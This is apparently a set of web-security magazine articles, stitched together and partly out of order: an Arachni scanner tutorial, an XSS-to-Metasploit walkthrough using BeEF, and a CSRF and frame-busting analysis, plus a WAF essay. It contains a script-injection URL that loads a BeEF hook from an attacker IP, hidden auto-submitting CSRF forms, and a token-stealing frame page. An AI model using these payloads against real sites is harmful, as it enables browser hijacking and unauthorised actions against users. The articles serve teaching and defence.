$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update RubyGems and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and its source) by executing the commands in Listing 2 in the Cygwin shell (note that these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin, right-click ash.exe and choose Run as administrator. In ash, enter:
$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst
Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all the functionality that is available from the command-line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and so on.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and more.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
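The include/exclude semantics behave roughly like filtering a list of names with regular expressions. The sketch below is an illustration only, not Arachni's actual parsing code, and the module names are made-up examples (run `arachni --lsmod` for the real list):

```ruby
# Hedged illustration of include/exclude-by-regexp module selection.
MODULES = %w[xss xss_path sqli csrf code_injection]  # example names only

def select_modules(patterns)
  selected = []
  patterns.each do |p|
    if p.start_with?('-')
      # a leading dash excludes modules matching the expression
      selected.reject! { |m| m =~ Regexp.new(p[1..-1]) }
    else
      # '*' selects everything; anything else is treated as a regexp
      selected |= (p == '*' ? MODULES : MODULES.grep(Regexp.new(p)))
    end
  end
  selected
end

puts select_modules(['*', '-xss']).inspect  # => ["sqli", "csrf", "code_injection"]
```

Patterns are applied in order, so a broad include followed by a narrow exclude gives "everything except" behaviour, as in the command above.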
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy and distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated from
# open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }
        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist utilized
                by this module will be vast and will add a considerable
                amount of time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old,_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually. Check if
                    unauthorized interfaces are exposed or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be extended easily. In the following example, we create a new reconnaissance module.
Move into your Arachni source tree and you'll find the modules directory. In there you'll find two directories: audit and recon. Move into the recon directory; this is where we will create our Ruby module.
Arachni makes it really easy: if your module needs external files, it will search a subdirectory with the same name as the module. For example, if you create a svn_digger_dirs.rb module, this module will be able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if it does, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note that the above code, as well as another module based on the SVNDigger filename wordlists, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links to additional information and a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again, this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.

HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now lives and works in Singapore, where he is the director of his company, Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security: penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, and ultimately take over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this:
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation

Figure 2. BeEF after configuration

Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.
Figure 1 User enters in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will now be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, then click on Standard Modules, Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, thanks to BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>

As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of plain text, the attacker enters a simple piece of JavaScript into the box, the JavaScript will execute in the user's browser instead of being displayed. The user just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF: Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool; the newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory

Figure 3. Connection to the BeEF controller

Figure 4. What the attacker will see

Figure 5. What the victim will see

Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the DEFACE STRING box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can talk directly to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins in the user's browser

Figure 8. Starting Metasploit

Figure 9. The jobs command

Figure 10. Metasploit after clicking Send Now

Figure 11. Meterpreter window, screenshot 1

Figure 12. Meterpreter window, screenshot 2
Now first ensure that the zombie is still connected. Then click on Standard Modules, Browser Exploit and configure the exploit as per the screenshot below; we're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check whether BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (in this case the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point in time we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, such as Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on it. We can then use these to port-scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:

Figure 13. Meterpreter window, screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
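The output-encoding step can be illustrated in a few lines. This sketch uses Ruby's standard library rather than the article's PHP, but PHP's htmlspecialchars() behaves in essentially the same way:

```ruby
require 'cgi'

# Encoding user input before reflecting it neutralises the payload:
# the browser renders the characters instead of executing a script.
payload = "<script>alert(document.domain)</script>"
puts CGI.escapeHTML(payload)
# => &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

Had search1.php encoded $a this way before echoing it, the alert() POC earlier in the article would have displayed the script text harmlessly instead of running it.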
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.

ARVIND DORAISWAMY
Arvind Doraiswamy is an information security professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com

References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:

<img src="http://twitter.com/home?status=evil.com"
     style="display:none">

Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, and so on.
Referrer checking: some users prohibit referrers, so you cannot simply require referrer headers. Besides, techniques exist to selectively create HTTP requests without referrers.
Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking users to fill in the text from a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011

Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of its authorized users.
Listing 1. HTML code used to bypass protection

<div style="display:none">
  <iframe name="hiddenFrame"></iframe>
  <form name="Form" action="http://site.com/post.php"
        target="hiddenFrame"
        method="POST">
    <input type="text" name="message" value="I like www.evil.com">
    <input type="submit">
  </form>
  <script>document.Form.submit()</script>
</div>
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

var token = window.frames[0].document.forms['messageForm'].token.value;

A browser's settings are not hard to modify, so the best way to secure a web application is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is to use FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>

A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so that they can be compared after the form is submitted.
Mechanisms used to subvert one-time tokens usually rely on brute-force attacks. Brute-forcing one-time tokens is worthwhile only if the mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
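For comparison, a token drawn from a cryptographically secure random source is not predictable from time-based inputs the way md5(uniqid(rand(), TRUE)) is. This sketch (in Ruby, not part of the article's PHP code) shows the idea:

```ruby
require 'securerandom'

# Sketch of a CSPRNG-backed one-time token: store it both in the session
# and in the form's hidden field, then compare on submission.
def new_token
  SecureRandom.hex(16)  # 32 hex characters, 128 bits of entropy
end

token = new_token
puts token.length  # 32
```

Because every call produces an independent 128-bit value, guessing or brute-forcing a single token within its lifetime is impractical.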
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).

Listing 2. Wrong token

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different frame killers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a frame killer is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the page with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES, an information security consulting, testing and research company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006. He then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethics, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com">
<input type="hidden" name="token" value="">
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide. They are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver the results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.

A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.

Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.

Above all, the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.

As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.

While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes it easier to use legitimately, but also encourages the malicious misuse of web applications. In addition, the internet also offers many possibilities for concealment and making action anonymous. As a result the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.

Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular, professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was.

The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.

Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of further systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications, one which they often do not fulfill.
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios with which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have lately started to combine these methods more often in order to achieve even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely on nothing but the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can bring clarity as to whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots. The shortcomings are frequently uncovered only over time, and by then, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
